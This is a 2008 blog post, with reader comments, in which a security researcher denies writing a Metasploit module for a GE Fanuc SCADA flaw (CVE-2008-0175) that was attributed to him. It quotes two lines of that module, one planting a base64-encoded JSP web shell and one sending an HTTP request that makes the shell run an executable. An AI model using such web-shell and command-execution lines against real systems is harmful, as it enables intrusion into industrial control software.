Thursday, November 06, 2008

As Sarah Palin would say: Thanks but No Thanks (for the GE Fanuc Exploit)

Although I thought about the feasibility of SCADA metasploit modules for the ICCP vulns (VU#190617 and others) I discovered back in 2006 but I didn't write the GE Fanuc Exploit on

And truth be told (hanging my head in shame) I've never actually written an exploit for any of the vulns I've discovered and I don't do vuln work anymore.

I've been clean for almost 2 years now.

But these are amusing. Must have struck a nerve.

proxy.writeFile('franzshell.jsp', Rex::Text.encode_base64(jspshell,''),false)
sock.put("GET /infoAgentSrv/franzshell.jsp?cmd=c:\\blogfranz.exe HTTP/1.0\r\n\r\n")

This module exploits an API flaw in GE Fanuc SCADA software

'Author' => [ 'Matthew Franz ' ],
'Version' => '$Revision: 20081031 $',
'References' =>
['CVE', '2008-0175'],
['URL', ''],
['URL', ''],
['URL', ''],

I was wondering why I saw an increase in referrals from and why someone asked me if I wrote an exploit. But of course I was too busy worrying about the election to care.


Richard Bejtlich said...

Hi Matt,

Thanks for posting this. I imagine some naive people may search for your name regarding this exploit. I'm glad you said this over-the-top reference to your name is obviously not your work.

Anonymous said...

I think we know who it is :)

Anonymous said...

reminiscent of happy times...

[Dshield] Fwd from NANOG: CiSCO IOS 12.* source code stolen

Matt Franz said...

As Dick Cheney would say, "Big Time!"